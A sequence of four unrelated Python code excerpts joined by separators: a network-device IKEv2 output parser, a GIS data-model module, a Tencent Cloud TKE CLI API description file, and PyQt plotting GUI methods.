},
'ipv6': {}
}
# =================================================
# Parser for 'show crypto ikev2 sa '
# =================================================
class ShowCryptoIkev2Sa(ShowCryptoIkev2SaSchema):
"""Parser for show crypto ikev2 sa"""
cli_command = ['show crypto ikev2 sa']
def cli(self, output=None):
if output is None:
output = self.device.execute(self.cli_command[0])
# initial return dictionary
ret_dict = {}
# IPv4 Crypto IKEv2 SA
p1 = re.compile(r'^IPv4 Crypto IKEv2 SA$')
# IPv6 Crypto IKEv2 SA
p2 = re.compile(r'^IPv6 Crypto IKEv2 SA$')
# 1 172.16.58.3/500 172.16.31.10/500 none/none READY
p3 = re.compile(r'^(?P<tunnel_id>\d+)\s+(?P<local_ip>[\w.]+)/(?P<local_port>\d+)\s+(?P<remote_ip>[\w.]+)/(?P<remote_port>\d+)\s+(?P<fvrf>\w+)/(?P<ivrf>\w+)\s+(?P<status>[\w]+)$')
# Encr: AES-CBC, keysize: 128, PRF: SHA1, Hash: SHA96, DH Grp:16, Auth sign: PSK, Auth verify: PSK
p4 = re.compile(r'^Encr:\s*(?P<encryption>[\w-]+),\s*keysize:\s*(?P<keysize>\d+),\s*PRF:\s*(?P<prf>\w+),\s*Hash:\s*(?P<hash>\w+),\s*DH Grp:(?P<dh_group>\d+),\s*Auth sign:\s*(?P<auth_sign>\w+),\s*Auth verify:\s*(?P<auth_verify>\w+)')
# Life/Active Time: 86400/735 sec
p5 = re.compile(r'^Life/Active Time:\s*(?P<life_time>\d+)/(?P<active_time>\d+)\s*sec$')
# CE id: 0, Session-id: 5206
p6 = re.compile(r'^CE id:\s*(?P<ce_id>\d+),\s*Session-id:\s*(?P<session_id>\d+)$')
# Local spi: 1F7B76961C3A77ED Remote spi: 1298FDE074BD724C
p7 = re.compile(r'^Local spi:\s*(?P<local_spi>[A-F\d]+)\s*Remote spi:\s*(?P<remote_spi>[A-F\d]+)$')
for line in output.splitlines():
line = line.strip()
# IPv4 Crypto IKEv2 SA
m = p1.match(line)
if m:
ipv4_ikev2_dict = ret_dict.setdefault('ipv4',{})
# IPv6 Crypto IKEv2 SA
m = p2.match(line)
if m:
ipv6_ikev2_dict = ret_dict.setdefault('ipv6',{})
# 1 172.16.58.3/500 6172.16.17.32/500 none/none READY
m = p3.match(line)
if m:
groups = m.groupdict()
tunnel_id = int(groups['tunnel_id'])
local_ip = groups['local_ip']
local_port = int(groups['local_port'])
remote_ip = groups['remote_ip']
remote_port = int(groups['remote_port'])
fvrf = groups['fvrf']
ivrf = groups['ivrf']
status = groups['status']
tunnel_dict = ipv4_ikev2_dict.setdefault(tunnel_id,{})
tunnel_dict['tunnel_id'] = tunnel_id
tunnel_dict['local_ip'] = local_ip
tunnel_dict['local_port'] = local_port
tunnel_dict['remote_ip'] = remote_ip
tunnel_dict['remote_port'] = remote_port
tunnel_dict['fvrf'] = fvrf
tunnel_dict['ivrf'] = ivrf
tunnel_dict['status'] = status
# Encr: AES-CBC, keysize: 128, PRF: SHA1, Hash: SHA96, DH Grp:16, Auth sign: PSK, Auth verify: PSK
m = p4.match(line)
if m:
groups = m.groupdict()
encryption = groups['encryption']
keysize = int(groups['keysize'])
prf = groups['prf']
hash = groups['hash']
dh_group = int(groups['dh_group'])
auth_sign = groups['auth_sign']
auth_verify = groups['auth_verify']
tunnel_dict['encryption'] = encryption
tunnel_dict['keysize'] = keysize
tunnel_dict['prf'] = prf
tunnel_dict['hash'] = hash
tunnel_dict['dh_group'] = dh_group
tunnel_dict['auth_sign'] = auth_sign
tunnel_dict['auth_verify'] = auth_verify
# Life/Active Time: 86400/735 sec
m = p5.match(line)
if m:
groups = m.groupdict()
life_time = int(groups['life_time'])
active_time = int(groups['active_time'])
tunnel_dict['life_time'] = life_time
tunnel_dict['active_time'] = active_time
# CE id: 0, Session-id: 5206
m = p6.match(line)
if m:
groups = m.groupdict()
ce_id = int(groups['ce_id'])
session_id = int(groups['session_id'])
tunnel_dict['ce_id'] = ce_id
tunnel_dict['session_id'] = session_id
# Local spi: 1F7B76961C3A77ED Remote spi: 1298FDE074BD724C
m = p7.match(line)
if m:
groups = m.groupdict()
local_spi = groups['local_spi']
remote_spi = groups['remote_spi']
tunnel_dict['local_spi'] = local_spi
tunnel_dict['remote_spi'] = remote_spi
return ret_dict
# =================================================
# Schema for
# Schema for 'show crypto ikev2 stats exchange'
# =================================================
class ShowCryptoIkev2StatsExchangeSchema(MetaParser):
"""Schema for show crypto ikev2 stats exchange"""
schema = {
'exchanges':{
Any(): {
'transmit_request': int,
'transmit_response': int,
'received_request': int,
'received_response': int
}
},
'error_notify': {
Any(): {
'transmit_request': int,
'transmit_response': int,
'received_request': int,
'received_response': int
}
},
'other_notify': {
Any(): {
'transmit_request': int,
'transmit_response': int,
'received_request': int,
'received_response': int
}
},
'config_request': {
Any(): {
'transmit': int,
'received': int
}
},
'other_counters': {
'nat_inside': int,
'no_nat': int
}
}
# =================================================
# Parser for
# Parser for 'show crypto ikev2 stats exchange'
# =================================================
class ShowCryptoIkev2StatsExchange(ShowCryptoIkev2StatsExchangeSchema):
"""Parser for show crypto ikev2 stats exchange"""
cli_command = ['show crypto ikev2 stats exchange']
def cli(self, output=None):
if output is None:
output = self.device.execute(self.cli_command[0])
# initial return dictionary
ret_dict = {}
# EXCHANGES
p1 = re.compile(r'^EXCHANGES$')
p1_a = re.compile(r'^ERROR NOTIFY$')
p1_b = re.compile(r'^OTHER NOTIFY$')
p1_c = re.compile(r'^CONFIG PAYLOAD TYPE TX RX$')
p1_d = re.compile(r'^OTHER COUNTERS$')
# IKE_SA_INIT 8618 0 0 5206
p2 = re.compile(r'^(?P<message>\w+)\s+(?P<tx_req>\d+)\s+(?P<tx_res>\d+)\s+(?P<rx_req>\d+)\s+(?P<rx_res>\d+)$')
# CFG_REQUEST 5206 0
p3 = re.compile(r'^(?P<message>\w+)\s+(?P<tx>\d+)\s+(?P<rx>\d+)$')
# NAT_INSIDE 3
p4 = re.compile(r'^(?P<message>\w+)\s+(?P<count>\d+)$')
ret_dict = {}
exchnge_flag = 0
error_notify_flag = 0
other_notify_flag = 0
for line in output.splitlines():
line = line.strip()
# EXCHANGES
m = p1.match(line)
if m:
exchnge_flag = 1
exchange_dict = ret_dict.setdefault('exchanges',{})
continue
# ERROR NOTIFY
m = p1_a.match(line)
if m:
exchnge_flag = 0
error_notify_flag = 1
other_notify_flag = 0
error_dict = ret_dict.setdefault('error_notify',{})
continue
# OTHER NOTIFY
m = p1_b.match(line)
if m:
exchnge_flag = 0
error_notify_flag = 0
other_notify_flag = 1
notify_dict = ret_dict.setdefault('other_notify',{})
continue
# CONFIG PAYLOAD TYPE TX RX
m = p1_c.match(line)
if m:
exchnge_flag = 0
error_notify_flag = 0
other_notify_flag = 0
config_dict = ret_dict.setdefault('config_request',{})
continue
# OTHER COUNTERS
m = p1_d.match(line)
if m:
exchnge_flag = 0
error_notify_flag = 0
other_notify_flag = 0
other_dict = ret_dict.setdefault('other_counters',{})
continue
# IKE_SA_INIT 8618 0 0 5206
m = p2.match(line)
if m:
groups = m.groupdict()
tx_req = int(groups['tx_req'])
tx_res = int(groups['tx_res'])
rx_req = int(groups['rx_req'])
rx_res = int(groups['rx_res'])
if exchnge_flag:
exchange_counter_dict = exchange_dict.setdefault(groups['message'].lower(),{})
exchange_counter_dict['transmit_request'] = tx_req
exchange_counter_dict['transmit_response'] = tx_res
exchange_counter_dict['received_request'] = rx_req
exchange_counter_dict['received_response'] = rx_res
if error_notify_flag:
error_counter_dict = error_dict.setdefault(groups['message'].lower(),{})
error_counter_dict['transmit_request'] = tx_req
error_counter_dict['transmit_response'] = tx_res
error_counter_dict['received_request'] = rx_req
error_counter_dict['received_response'] = rx_res
if other_notify_flag:
notify_counter_dict = notify_dict.setdefault(groups['message'].lower(),{})
notify_counter_dict['transmit_request'] = tx_req
notify_counter_dict['transmit_response'] = tx_res
notify_counter_dict['received_request'] = rx_req
notify_counter_dict['received_response'] = rx_res
continue
# CFG_REQUEST 5206 0
m = p3.match(line)
if m:
groups = m.groupdict()
tx = int(groups['tx'])
rx = int(groups['rx'])
config_counter_dict = config_dict.setdefault(groups['message'].lower(),{})
config_counter_dict['transmit'] = tx
config_counter_dict['received'] = rx
continue
m | |
% (
T("Is this a strict hierarchy?"),
T("Select this if all specific locations need a parent at the deepest level of the location hierarchy. For example, if 'district' is the smallest division in the hierarchy, then all specific locations would be required to have a district as a parent.")))
table.location_parent_required.label = T("Must a location have a parent location?")
table.location_parent_required.comment = DIV(
_class="tooltip",
_title="%s|%s" % (
T("Must a location have a parent location?"),
T("Select this if all specific locations need a parent location in the location hierarchy. This can assist in setting up a 'region' representing an affected area.")))
edit_Ln_tip_1 = T("Set True to allow editing this level of the location hierarchy by users who are not MapAdmins.")
edit_Ln_tip_2 = T("This is appropriate if this level is under construction. To prevent accidental modification after this level is complete, this can be set to False.")
max_allowed_level_num = current.gis.max_allowed_level_num
for n in range(1, max_allowed_level_num):
field = "edit_L%d" % n
table[field].label = T("Edit Level %d Locations?") % n
table[field].comment = DIV(
_class="tooltip",
_title="%s|%s|%s" % (
T("Is editing level L%d locations allowed?") % n,
edit_Ln_tip_1,
edit_Ln_tip_2
)
)
# -------------------------------------------------------------------------
@staticmethod
def gis_hierarchy_onvalidation(form):
"""
If strict, hierarchy names must not have gaps.
"""
form_vars = form.vars
if form_vars.strict_hierarchy:
gis = current.gis
hierarchy_level_keys = gis.hierarchy_level_keys
level_names = [form_vars[key] if key in form_vars else None
for key in hierarchy_level_keys]
# L0 is always missing because its label is hard-coded
gaps = filter(None, map(lambda n:
not level_names[n] and
level_names[n + 1] and
"L%d" % n,
range(1, gis.max_allowed_level_num)))
if gaps:
hierarchy_gap = current.T("A strict location hierarchy cannot have gaps.")
for gap in gaps:
form.errors[gap] = hierarchy_gap
# =============================================================================
class S3GISConfigModel(S3Model):
"""
GIS Config model: Web Map Context
- Site config
- Personal config
- OU config (Organisation &/or Team)
"""
names = ("gis_config",
"gis_menu",
"gis_marker",
"gis_projection",
"gis_config_id",
"gis_marker_id",
"gis_projection_id",
"gis_config_form_setup",
)
def model(self):
T = current.T
db = current.db
gis = current.gis
location_id = self.gis_location_id
settings = current.deployment_settings
NONE = current.messages["NONE"]
# Shortcuts
add_components = self.add_components
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
super_link = self.super_link
# =====================================================================
# GIS Markers (Icons)
tablename = "gis_marker"
define_table(tablename,
Field("name", length=64, notnull=True, unique=True,
label = T("Name"),
),
# If-needed, then Symbology should be here
#symbology_id(),
Field("image", "upload", autodelete=False,
custom_retrieve = gis_marker_retrieve,
custom_retrieve_file_properties = gis_marker_retrieve_file_properties,
label = T("Image"),
represent = lambda filename: \
(filename and [DIV(IMG(_src=URL(c="static",
f="img",
args=["markers",
filename]),
_height=40))] or [""])[0],
# upload folder needs to be visible to the download() function as well as the upload
uploadfolder = os.path.join(current.request.folder,
"static",
"img",
"markers"),
widget = S3ImageCropWidget((50, 50)),
),
# We could get size client-side using Javascript's Image() class, although this is unreliable!
Field("height", "integer", # In Pixels, for display purposes
writable = False,
),
Field("width", "integer",
writable = False,
),
*s3_meta_fields())
# CRUD Strings
ADD_MARKER = T("Create Marker")
crud_strings[tablename] = Storage(
label_create = ADD_MARKER,
title_display = T("Marker Details"),
title_list = T("Markers"),
title_update = T("Edit Marker"),
label_list_button = T("List Markers"),
label_delete_button = T("Delete Marker"),
msg_record_created = T("Marker added"),
msg_record_modified = T("Marker updated"),
msg_record_deleted = T("Marker deleted"),
msg_list_empty = T("No Markers currently available"))
# Reusable field to include in other table definitions
# @ToDo: Widget to include icons in dropdown: http://jqueryui.com/selectmenu/#custom_render
marker_represent = gis_MarkerRepresent()
marker_id = S3ReusableField("marker_id", "reference %s" % tablename,
label = T("Marker"),
ondelete = "SET NULL",
represent = marker_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "gis_marker.id",
"%(name)s",
zero=T("Use default"))),
sortby = "name",
widget = S3SelectWidget(icons=self.gis_marker_options),
comment=S3PopupLink(c = "gis",
f = "marker",
#vars = {"child": "marker_id",
# "parent": "symbology"},
label = ADD_MARKER,
title = T("Marker"),
tooltip = "%s|%s|%s" % (T("Defines the icon used for display of features on interactive map & KML exports."),
T("A Marker assigned to an individual Location is set if there is a need to override the Marker assigned to the Feature Class."),
T("If neither are defined, then the Default Marker is used.")),
),
)
# Components
#add_components(tablename,
# gis_layer_entity = {"link": "gis_style",
# "joinby": "marker_id",
# "key": "layer_id",
# "actuate": "hide",
# "autocomplete": "name",
# "autodelete": False,
# },
# )
configure(tablename,
deduplicate = self.gis_marker_deduplicate,
onvalidation = self.gis_marker_onvalidation,
)
# =====================================================================
# GIS Projections
tablename = "gis_projection"
proj4js = T("%(proj4js)s definition") % dict(proj4js="Proj4js")
define_table(tablename,
Field("name", length=64, notnull=True, unique=True,
label = T("Name"),
),
Field("epsg", "integer", notnull=True,
label = "EPSG",
requires = IS_NOT_EMPTY(),
),
Field("maxExtent", length=64, notnull=True,
label = T("Maximum Extent"),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Maximum Extent"),
T("The Maximum valid bounds, in projected coordinates"))),
# @ToDo: Add a specialised validator
requires = IS_NOT_EMPTY(),
),
Field("proj4js",
label = proj4js,
comment = DIV(_class="stickytip",
_title="%s|%s" % (proj4js,
T("String used to configure Proj4js. Can be found from %(url)s") % dict(url=A("http://spatialreference.org",
_href="http://spatialreference.org",
_target="_blank")))),
),
Field("units", notnull=True,
label = T("Units"),
requires = IS_IN_SET(["m", "degrees"],
zero=None),
),
*s3_meta_fields())
# CRUD Strings
ADD_PROJECTION = T("Create Projection")
crud_strings[tablename] = Storage(
label_create = ADD_PROJECTION,
title_display = T("Projection Details"),
title_list = T("Projections"),
title_update = T("Edit Projection"),
label_list_button = T("List Projections"),
label_delete_button = T("Delete Projection"),
msg_record_created = T("Projection added"),
msg_record_modified = T("Projection updated"),
msg_record_deleted = T("Projection deleted"),
msg_list_empty = T("No Projections currently defined"))
# Reusable field to include in other table definitions
represent = S3Represent(lookup=tablename)
projection_id = S3ReusableField("projection_id", "reference %s" % tablename,
sortby="name",
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "gis_projection.id",
represent)),
represent = represent,
label = T("Projection"),
comment=S3PopupLink(c = "gis",
f = "projection",
label = ADD_PROJECTION,
title = T("Projection"),
tooltip = "%s|%s|%s" % (T("The system supports 2 projections by default:"),
T("Spherical Mercator (900913) is needed to use OpenStreetMap/Google/Bing base layers."),
T("WGS84 (EPSG 4236) is required for many WMS servers.")),
),
ondelete = "RESTRICT")
configure(tablename,
deduplicate = self.gis_projection_deduplicate,
deletable = False,
)
# =====================================================================
# GIS Config
#
# uuid==SITE_DEFAULT => Site default settings
#
# @ToDo: Settings that apply will be the Site Settings modified
# according to any active Event or Region config and any OU or
# Personal config found
org_group_label = settings.get_org_groups()
org_site_label = settings.get_org_site_label()
teams_label = settings.get_hrm_teams()
pe_types = {1: T("Person"),
2: T(teams_label),
4: T(org_site_label),
7: T("Organization"),
9: "SITE_DEFAULT",
}
if settings.get_org_branches():
pe_types[6] = T("Branch")
if org_group_label:
pe_types[8] = T(org_group_label)
tablename = "gis_config"
define_table(tablename,
# Name displayed in the GIS config menu.
Field("name"),
# pe_id for Personal/OU configs
super_link("pe_id", "pr_pentity"),
# Gets populated onvalidation
Field("pe_type", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(pe_types)),
readable = False,
writable = False,
),
# Default:
# If a person has multiple saved configs then this decides
# which is the one to use
Field("pe_default", "boolean",
default = False,
),
# Region field
location_id("region_location_id",
requires = IS_EMPTY_OR(IS_LOCATION(level=gis.hierarchy_level_keys)),
widget = S3LocationAutocompleteWidget(),
),
# CRUD Settings
# Default Location
location_id("default_location_id",
requires = IS_EMPTY_OR(IS_LOCATION()),
widget = S3LocationAutocompleteWidget(),
),
# Map Settings
Field("zoom", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(1, 20)),
),
Field("lat", "double",
requires = IS_EMPTY_OR(IS_LAT()),
),
Field("lon", "double",
requires = IS_EMPTY_OR(IS_LON()),
),
projection_id(#empty=False,
# Nice if we could get this set to epsg field
#default=900913
),
#symbology_id(),
# Overall Bounding Box for sanity-checking inputs
Field("lat_min", "double",
# @ToDo: Remove default once we have cascading working
default = -90,
requires = IS_EMPTY_OR(IS_LAT()),
),
Field("lat_max", "double",
# @ToDo: Remove default once we have cascading working
default = 90,
requires = IS_EMPTY_OR(IS_LAT()),
),
Field("lon_min", "double",
# @ToDo: Remove default once we have cascading working
default = -180,
requires = IS_EMPTY_OR(IS_LON()),
),
Field("lon_max", "double",
# @ToDo: Remove default once we have cascading working
default = 180,
requires = IS_EMPTY_OR(IS_LON()),
),
# This should be turned off for Offline deployments or expensive SatComms, such as BGAN
Field("geocoder", "boolean"),
# Whether the config is just temporary for taking a screenshot
Field("temp", "boolean",
default = False,
readable = False,
writable = False,
),
Field("wmsbrowser_url"),
Field("wmsbrowser_name",
default = "Web Map Service",
),
# Note: This hasn't yet been changed for any instance
# Do we really need it to be configurable?
Field("zoom_levels", "integer",
# @ToDo: Remove default once we have cascading working
default = 22,
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(1, 30)),
readable = False,
writable = False,
),
Field("image", "upload", autodelete=False,
custom_retrieve = gis_marker_retrieve,
custom_retrieve_file_properties = gis_marker_retrieve_file_properties,
label = T("Image"),
represent = lambda filename: \
| |
<reponame>bopopescu/tencentcloud-cli-intl-en<gh_stars>0
# -*- coding: utf-8 -*-
DESC = "tke-2018-05-25"
INFO = {
"CreateCluster": {
"params": [
{
"name": "ClusterCIDRSettings",
"desc": "Container networking configuration information for the cluster"
},
{
"name": "ClusterType",
"desc": "Cluster type. Managed cluster: MANAGED_CLUSTER; self-deployed cluster: INDEPENDENT_CLUSTER."
},
{
"name": "RunInstancesForNode",
"desc": "Pass-through parameter for CVM creation in the format of a JSON string. For more information, see the API for [creating a CVM instance](https://cloud.tencent.com/document/product/213/15730)."
},
{
"name": "ClusterBasicSettings",
"desc": "Basic configuration information of the cluster"
},
{
"name": "ClusterAdvancedSettings",
"desc": "Advanced configuration information of the cluster"
},
{
"name": "InstanceAdvancedSettings",
"desc": "Advanced configuration information of the node"
},
{
"name": "ExistedInstancesForNode",
"desc": "Configuration information of an existing instance"
},
{
"name": "InstanceDataDiskMountSettings",
"desc": "CVM type and the corresponding data disk mounting configuration information."
}
],
"desc": "This API is used to create a cluster."
},
"DescribeImages": {
"params": [],
"desc": "This API is used to get image information."
},
"ModifyClusterAsGroupAttribute": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
},
{
"name": "ClusterAsGroupAttribute",
"desc": "Cluster-associated scaling group attributes"
}
],
"desc": "Modify cluster scaling group attributes"
},
"DeleteClusterEndpoint": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
},
{
"name": "IsExtranet",
"desc": "Whether public network access is enabled or not (True = public network access, FALSE = private network access, with the default value as FALSE)."
}
],
"desc": "Delete the cluster access port (intranet / extranet access is enabled for independent clusters, and intranet access is supported for managed clusters)"
},
"CreateClusterInstances": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID. Enter the ClusterId field returned by the DescribeClusters API"
},
{
"name": "RunInstancePara",
"desc": "Pass-through parameter for CVM creation in the format of a JSON string. For more information, see the [RunInstances](https://cloud.tencent.com/document/product/213/15730) API."
},
{
"name": "InstanceAdvancedSettings",
"desc": "Additional parameter to be set for the instance"
}
],
"desc": "This API is used to create one or more nodes in a cluster."
},
"ModifyClusterAttribute": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
},
{
"name": "ProjectId",
"desc": "Project of the Cluster"
},
{
"name": "ClusterName",
"desc": "Cluster name"
},
{
"name": "ClusterDesc",
"desc": "Cluster description"
}
],
"desc": "This API is used to modify cluster attributes."
},
"DeleteClusterAsGroups": {
"params": [
{
"name": "ClusterId",
"desc": "The cluster ID, obtained through the [DescribeClusters](https://cloud.tencent.com/document/api/457/31862) API."
},
{
"name": "AutoScalingGroupIds",
"desc": "Cluster scaling group ID list"
},
{
"name": "KeepInstance",
"desc": "Whether to keep nodes in the scaling group. Default to **false** (not keep)"
}
],
"desc": "Delete a cluster scaling group"
},
"DeleteClusterRoute": {
"params": [
{
"name": "RouteTableName",
"desc": "Route table name."
},
{
"name": "GatewayIp",
"desc": "Next hop address."
},
{
"name": "DestinationCidrBlock",
"desc": "Destination CIDR."
}
],
"desc": "This API is used to delete a cluster route."
},
"DescribeClusterEndpointVipStatus": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
}
],
"desc": "Query cluster open port process status (only supports external ports of the managed cluster)"
},
"DeleteCluster": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
},
{
"name": "InstanceDeleteMode",
"desc": "Policy used to delete an instance in the cluster: terminate (terminates the instance. Only available for instances on pay-as-you-go CVMs); retain (only removes it from the cluster. The instance will be retained.)"
},
{
"name": "ResourceDeleteOptions",
"desc": "Specifies the policy to deal with resources in the cluster when the cluster is deleted. It only supports CBS now. The default policy is to retain CBS disks."
}
],
"desc": "This API is used to delete a cluster. (Cloud API v3)."
},
"CreateClusterAsGroup": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
},
{
"name": "AutoScalingGroupPara",
"desc": "The pass-through parameters for scaling group creation, in the format of a JSON string. For more information, see the [CreateAutoScalingGroup](https://cloud.tencent.com/document/api/377/20440) API. The **LaunchConfigurationId** is created with the LaunchConfigurePara parameter, which does not support data entry."
},
{
"name": "LaunchConfigurePara",
"desc": "The pass-through parameters for launch configuration creation, in the format of a JSON string. For more information, see the [CreateLaunchConfiguration](https://cloud.tencent.com/document/api/377/20447) API. **ImageId** is not required as it is already included in the cluster dimension. **UserData** is not required as it’s set through the **UserScript**."
},
{
"name": "InstanceAdvancedSettings",
"desc": "Advanced configuration information of the node"
},
{
"name": "Labels",
"desc": "Node label array"
}
],
"desc": "Create a scaling group for an existing cluster"
},
"DescribeExistedInstances": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID. Enter the `ClusterId` field returned when you call the DescribeClusters API (Only VPC ID obtained through `ClusterId` need filtering conditions. When comparing statuses, the nodes on all clusters in this region will be used for comparison. You cannot specify `InstanceIds` and `ClusterId` at the same time.)"
},
{
"name": "InstanceIds",
"desc": "Query by one or more instance ID(s). Instance ID format: ins-xxxxxxxx. (Refer to section ID.N of the API overview for this parameter’s specific format.) Up to 100 instances are allowed for each request. You cannot specify InstanceIds and Filters at the same time."
},
{
"name": "Filters",
"desc": "Filter condition. For fields and other information, see [the DescribeInstances API](https://cloud.tencent.com/document/api/213/15728). If a ClusterId has been set, then the cluster’s VPC ID will be attached as a query field. In this situation, if a \"vpc-id\" is specified in Filter, then the specified VPC ID must be consistent with the cluster’s VPC ID."
},
{
"name": "VagueIpAddress",
"desc": "Filter by instance IP (Supports both private and public IPs)"
},
{
"name": "VagueInstanceName",
"desc": "Filter by instance name"
},
{
"name": "Offset",
"desc": "Offset. Default value: 0. For more information on Offset, see the relevant section in the API [Introduction](https://cloud.tencent.com/document/api/213/15688)."
},
{
"name": "Limit",
"desc": "Number of returned results. Default value: 20. Maximum value: 100. For more information on Limit, see the relevant section in the API [Introduction](https://cloud.tencent.com/document/api/213/15688)."
}
],
"desc": "This API is used to query one or more existing node and determine whether they can be added to a cluster."
},
"CreateClusterRouteTable": {
"params": [
{
"name": "RouteTableName",
"desc": "Route table name"
},
{
"name": "RouteTableCidrBlock",
"desc": "Route table CIDR"
},
{
"name": "VpcId",
"desc": "VPC bound to the route table"
},
{
"name": "IgnoreClusterCidrConflict",
"desc": "Whether to ignore CIDR conflicts"
}
],
"desc": "This API is used to create a cluster route table."
},
"DescribeClusterAsGroupOption": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
}
],
"desc": "Cluster auto scaling configuration"
},
"DescribeClusters": {
"params": [
{
"name": "ClusterIds",
"desc": "Cluster ID list (When it is empty,\nall clusters under the account will be obtained)"
},
{
"name": "Offset",
"desc": "Offset. Default value: 0"
},
{
"name": "Limit",
"desc": "Maximum number of output entries. Default value: 20"
},
{
"name": "Filters",
"desc": "Filter condition. Currently, only filtering by a single ClusterName is supported"
}
],
"desc": "This API is used to query clusters list."
},
"DescribeClusterEndpointStatus": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
},
{
"name": "IsExtranet",
"desc": "Whether public network access is enabled or not (True = public network access, FALSE = private network access, with the default value as FALSE)."
}
],
"desc": "Query cluster access port status (intranet / extranet access is enabled for independent clusters, and intranet access is supported for managed clusters)"
},
"DescribeClusterAsGroups": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
},
{
"name": "AutoScalingGroupIds",
"desc": "Scaling group ID list. If this value is null, it indicates that all cluster-associated scaling groups are pulled."
},
{
"name": "Offset",
"desc": "Offset. This value defaults to 0. For more information on Offset, see the relevant sections in API [Overview](https://cloud.tencent.com/document/api/213/15688)."
},
{
"name": "Limit",
"desc": "Number of returned results. This value defaults to 20. The maximum is 100. For more information on Limit, see the relevant sections in API [Overview](https://cloud.tencent.com/document/api/213/15688)."
}
],
"desc": "Cluster-associated scaling group list"
},
"CreateClusterEndpoint": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
},
| |
self.get_ax_vis()
try:
xmin = float(xmin_text)
ax.set_xbound(lower=xmin)
except ValueError:
self.update_status('xmin must be a number')
try:
xmax = float(xmax_text)
ax.set_xbound(upper=xmax)
except ValueError:
self.update_status('xmax must be a number')
self.figcanvas_vis.draw()
def ylim_action_vis(self):
ymin_text = self.ymin_txtbx_vis.text()
ymax_text = self.ymax_txtbx_vis.text()
ax = self.get_ax_vis()
try:
ymin = float(ymin_text)
ax.set_ybound(lower=ymin)
except ValueError:
self.update_status('ymin must be a number')
try:
ymax = float(ymax_text)
ax.set_ybound(upper=ymax)
except ValueError:
self.update_status('ymax must be a number')
self.figcanvas_vis.draw()
def clear_action_vis(self):
self.vishandler.set_data([], replace=True)
fig = self.figcanvas_vis.figure
fig.clf()
self.lineselector_menu_vis.clear()
self.useexisting_chkbx_vis.setCheckState(Qt.Unchecked)
def figsize_action_vis(self):
fig = self.figcanvas_vis.figure
width = self.figw_txtbx_vis.text()
height = self.figh_txtbx_vis.text()
try:
width = float(width)
height = float(height)
fig.set_figwidth(width)
fig.set_figheight(height)
self.figcanvas_vis.draw()
except ValueError:
self.update_status('Figure width and height must be numbers')
def lineselector_action_vis(self):
try:
label = self.lineselector_menu_vis.currentText()
data = self.line_dict_vis[label]
line = data.get_line()
linestyle = line.get_linestyle()
linewidth = line.get_linewidth()
markerstyle = line.get_marker()
markersize = line.get_markersize()
self.linelbl_txtbx_vis.setText(label)
self.linestyle_menu_vis.setCurrentText(linestyle)
self.linewidth_txtbx_vis.setValue(linewidth)
self.markerstyle_menu_vis.setCurrentText(Line2D.markers[markerstyle])
self.markersize_txtbx_vis.setValue(int(markersize))
except KeyError:
pass
def linelbl_action_vis(self):
try:
old_label = self.lineselector_menu_vis.currentText()
new_label = self.linelbl_txtbx_vis.text()
if old_label != new_label:
data = self.line_dict_vis[old_label]
ax = self.get_ax_vis()
line = data.get_line()
line.set_label(new_label)
data.set_label(new_label)
self.shwowleg_action_vis()
self.figcanvas_vis.draw()
self.line_dict_vis = {d.get_label():d for d in self.vishandler.get_plot_data()}
self.lineselector_menu_vis.clear()
for n in self.line_dict_vis.keys():
self.lineselector_menu_vis.addItem(n)
self.lineselector_menu_vis.setCurrentText(new_label)
except KeyError:
pass
def linecolor_action_vis(self):
try:
label = self.lineselector_menu_vis.currentText()
data = self.line_dict_vis[label]
line = data.get_line()
old_color = line.get_color()
qd = QColorDialog()
new_color = qd.getColor(initial=QColor(old_color)).name(QColor.HexRgb)
line.set_color(new_color)
self.shwowleg_action_vis()
self.figcanvas_vis.draw()
except KeyError:
pass
def linestyle_action_vis(self):
try:
label = self.lineselector_menu_vis.currentText()
ls = self.linestyle_menu_vis.currentText()
data = self.line_dict_vis[label]
line = data.get_line()
line.set_linestyle(ls)
self.shwowleg_action_vis()
self.figcanvas_vis.draw()
except KeyError:
pass
def linewidth_action_vis(self):
try:
label = self.lineselector_menu_vis.currentText()
lw = self.linewidth_txtbx_vis.value()
data = self.line_dict_vis[label]
line = data.get_line()
line.set_linewidth(lw)
self.shwowleg_action_vis()
self.figcanvas_vis.draw()
except KeyError:
pass
def markerstyle_action_vis(self):
try:
label = self.lineselector_menu_vis.currentText()
m = self.markerstyle_menu_vis.currentText()
data = self.line_dict_vis[label]
line = data.get_line()
line.set_marker(FuelcellUI.markerstyles_rev[m])
self.shwowleg_action_vis()
self.figcanvas_vis.draw()
except KeyError:
pass
def markersize_action_vis(self):
try:
label = self.lineselector_menu_vis.currentText()
ms = self.markersize_txtbx_vis.value()
data = self.line_dict_vis[label]
line = data.get_line()
line.set_markersize(int(ms))
self.shwowleg_action_vis()
self.figcanvas_vis.draw()
except KeyError:
pass
def choose_saveloc_vis(self):
fd = QFileDialog()
fd.setViewMode(QFileDialog.Detail)
fd.setDefaultSuffix('png')
filename, _ = fd.getSaveFileName(self, 'Save Location', self.default_saveloc_vis())
if not filename:
filename = self.default_saveloc_vis()
self.saveloc_txtbx_vis.setText(filename)
def save_action_vis(self):
try:
fig = self.figcanvas_vis.figure
loc = self.saveloc_txtbx_vis.text()
dpi = self.figres_txtbx_vis.text()
if not dpi.isdigit():
self.update_status('Figure resolution must be an integer')
dpi = 300
else:
dpi = int(dpi)
fig.savefig(loc, dpi=dpi)
self.update_status('Image saved successfully')
except Exception as e:
self.update_status('ERROR: ' + str(e))
def draw_plot_vis(self):
fig = self.figcanvas_vis.figure
fig.clf()
